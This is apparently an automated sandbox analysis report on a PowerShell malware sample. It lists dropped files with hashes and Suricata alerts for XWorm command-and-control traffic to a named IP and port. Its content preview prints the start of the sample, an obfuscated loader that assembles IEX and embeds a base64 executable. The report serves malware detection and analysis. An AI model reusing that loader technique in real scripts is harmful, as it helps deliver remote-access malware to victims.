SSDEEP:	192:MCBpk8Qiqz0BU/SaiRgt0GsNzuiFZZ24IO8a9:VB7QiVBU/SabtvezuiFZY4IO8a9
MD5:	9E154CB72CCF82F244806AB2E0076627
SHA1:	F853D611EB6B5C3F449ACFBC486AB013BE208EFE
SHA-256:	D5E8A89BBA393D8EE4D82DD23F5FC351E53136B0ADAB941ED823E942109FA91A
SHA-512:	2A17EE1B2447745E37F842DA22C35139C15D631159179992B47D498472C12F1247A6FB54791E2AF3CFED8A3E9EC56E737BA0EC998B74017849AB51E791BFCC82
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.9.3.5.8.6.5.3.2.0.9.6.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.9.3.5.8.6.5.9.6.1.5.8.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.b.8.d.c.6.6.-.0.0.c.b.-.4.1.6.9.-.9.a.4.1.-.b.d.6.3.1.1.8.6.8.6.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.1.5.9.c.c.2.-.b.1.c.6.-.4.3.e.3.-.8.c.2.e.-.5.7.1.1.1.e.1.a.c.3.3.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.4.-.0.0.0.1.-.0.0.1.4.-.0.3.3.7.-.a.3.7.f.c.e.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6CE.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Dec 29 08:51:05 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	385553
Entropy (8bit):	3.3576009797663233
Encrypted:	false
SSDEEP:	3072:HjEBH8cvI+4uEq6cKxWLTgezeymxBn43MNsglVQHQ+:HjgHHJ4VYTgTy6KqVQw
MD5:	E56A4614A662E28146885ABB23FED56F
SHA1:	32C5E4888DE16CFBB2FB0F069E2E26B17F27403D
SHA-256:	C198035F419A72F58D0F0EC4A775D0E9EE7534929E6A40CFC2805D60637DE483
SHA-512:	B714F87E36ECD29C05C9AB5876C63D68E77DD2995F8EEF9C4A667E16E3033510F3193C8EA300EE7E7A764E104ABF6EBB4B9ED6DD20C832D1B9A38589E4D96EB3
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......y.qg........................<...........$...D......T+...s..........`.......8...........T...........hH..............h..........T,..............................................................................eJ.......,......GenuineIntel............T.............qg....Q........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD894.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8360
Entropy (8bit):	3.689361290662274
Encrypted:	false
SSDEEP:	192:R6l7wVeJ0h6R6Y2IS4ugmfZ8SprK89bn8sf9ONm:R6lXJi6R6YRSRgmfOcnPf9V
MD5:	9B2D7B74123825F8A32EE938C867E8FA
SHA1:	FFC93F7D0BF39A10DAC48212BCEFA27127068C4D
SHA-256:	F145810735061CAC3083B893E9063EFAF4067034EE10D73E04347E31E33098CF
SHA-512:	AABEA0B8C5DDF616428A11AF441F67054B484A83E654F4388A26D0581765085BEE31121E12E2B2ABE5C68EEE5D9595DF1FEE9B3E2C4E2D88B47D12631B8CF8DE
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD8B4.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4728
Entropy (8bit):	4.444708844389835
Encrypted:	false
SSDEEP:	48:cvIwWl8zsUJg77aI9u5WpW8VYBYm8M4J3cFn+q8vYYmDI8d:uIjfSI7QI7VdJuKXmDI8d
MD5:	42D53AD1A68E986974950AA9479A6688
SHA1:	E0B20720A3E000C5B2F8C982233CCB790177E9F2
SHA-256:	C4DEB110259CC36DB117C56E172D4ECC3396D6CB641382751C19D4E1EC8680F1
SHA-512:	858F1EB1EB5FD3BB768ABB8A253215A079671A01F1D7A16D5489BF6177ACF6DEB2F4C436BFEC4C47739A79981B3D14EECF6482CF22D6159C65C130B9EF5D30F2
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="652313" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllultnxj:NllU
MD5:	F93358E626551B46E6ED5A0A9D29BD51
SHA1:	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
SHA-256:	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
SHA-512:	D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_loop3fyr.xmn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnwuctoj.gsi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.720960520022621
Encrypted:	false
SSDEEP:	48:EYKZxNvLPr3C4U28Zj+ukvhkvklCywCmdUS+nwsl13SogZo90S+nwsl13SogZop1:G1v33CxHZLkvhkvCCtibwsCHNbwsCHW
MD5:	3DBF5EEA8FCA26371DD771A5E2DB41B1
SHA1:	D24B1145F77F4FC533A71BFEAF5C3A7F1912BA48
SHA-256:	DF4CC729574A9A523A34682494EBA920C61E14BA8A94FAB2C6919A80512EFDC6
SHA-512:	F412A9D8A7926FF76AFD4FB89CBC89BFE785C6699DEE98BBEA38F651B63EC840E8F6949CEC058D9BAC57908045EA57A0CE7D1B584FF35E63F17E21FAE084111A
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....!..~.Y..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......z.Y..>.,~.Y......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.F...........................%..A.p.p.D.a.t.a...B.V.1......Y.F..Roaming.@......CW.^.Y.F..........................7...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.F....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QSACXR4DH9JRFG2F74VT.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.720960520022621
Encrypted:	false
SSDEEP:	48:EYKZxNvLPr3C4U28Zj+ukvhkvklCywCmdUS+nwsl13SogZo90S+nwsl13SogZop1:G1v33CxHZLkvhkvCCtibwsCHNbwsCHW
MD5:	3DBF5EEA8FCA26371DD771A5E2DB41B1
SHA1:	D24B1145F77F4FC533A71BFEAF5C3A7F1912BA48
SHA-256:	DF4CC729574A9A523A34682494EBA920C61E14BA8A94FAB2C6919A80512EFDC6
SHA-512:	F412A9D8A7926FF76AFD4FB89CBC89BFE785C6699DEE98BBEA38F651B63EC840E8F6949CEC058D9BAC57908045EA57A0CE7D1B584FF35E63F17E21FAE084111A
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....!..~.Y..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......z.Y..>.,~.Y......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.F...........................%..A.p.p.D.a.t.a...B.V.1......Y.F..Roaming.@......CW.^.Y.F..........................7...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.F....Q...........

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466344622931147
Encrypted:	false
SSDEEP:	6144:3IXfpi67eLPU9skLmb0b4QWSPKaJG8nAgejZMMhA2gX4WABl0uNfdwBCswSb+:4XD94QWlLZMM6YFHl++
MD5:	AEAA3F38568B1100D534ECC4F8A9FF10
SHA1:	34DD4AD387F6209BF05D5A3C9222643CB393281E
SHA-256:	37BC7A72782B787515C5FEB12FCBC261612D3BEE453FABEA99903356DC7A7C67
SHA-512:	1BE2828D2E02FFA907144174CC9693290FB303AF83DDCF0639ED3E8182C7441501BD0C5BC6F2540D6D1A11C3648B82D259F739E3114765F67F5D013BD78C9658
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.o...Y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (65461), with CRLF line terminators
Entropy (8bit):	5.189067791033469
TrID:
File name:	92.255.57.155.ps1
File size:	333'029 bytes
MD5:	f555029ba45bc9f18b451066721785c8
SHA1:	930ea2fb160b84b3fd841aebd5a462896eccd400
SHA256:	d6e3fbc61a201ac72495e59f7f2f3967e2ecf11f54675618a17b2ab4986e6f8b
SHA512:	33312f8bf6abba5c02a6f9ed5464c64c57656f6b747049c68dc67052dca31ace0c631c4cbbb4351944c081d8a70bc49db6da835562149305749f28d984213b3e
SSDEEP:	6144:yeAKzAgnVwyuKXwB4c4K15IiTksfUXLID5uzynrKMk8kRJs9Skjugiwuz/vVnich:nGYvUcJrk6TKW
TLSH:	44642C318804B91FCEEF1F87B5002FD27C79257BDF591018A98F16B96A68238597AF70
File Content Preview:	ipconfig /flushdns...... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$JOOOO="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQ

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-29T09:49:16.109200+0100	2858800	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:49:16.560934+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:16.610128+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:49:29.301964+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:29.301964+0100	2858801	ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:30.464963+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:30.466737+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:49:44.402294+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:44.404637+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:49:58.404895+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:58.406885+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:49:59.328119+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:03.029819+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:03.047504+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:03.964582+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:04.172071+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:04.245200+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.292081+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:04.364800+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.455341+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:04.484146+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.667286+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.786671+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.814163+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:04.950315+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:05.692558+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:05.714918+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:05.902574+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:05.913851+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:06.044909+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:06.060632+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:06.869260+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:07.000734+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:07.045873+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:07.120152+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:07.256110+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:07.379455+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:07.379532+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:07.540764+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:07.569545+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:07.660213+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:08.464730+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:08.473940+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:08.675163+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:08.803911+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:08.887654+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:08.913204+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:09.043552+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:09.163558+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:09.622287+0100	2858799	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:10.074005+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:10.085689+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:10.417934+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:10.715280+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:10.868985+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:10.944601+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:10.967271+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:11.520798+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:11.597885+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:11.611605+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:11.760592+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:12.549466+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:12.759741+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:12.783218+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:12.874435+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:12.879169+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:13.089706+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
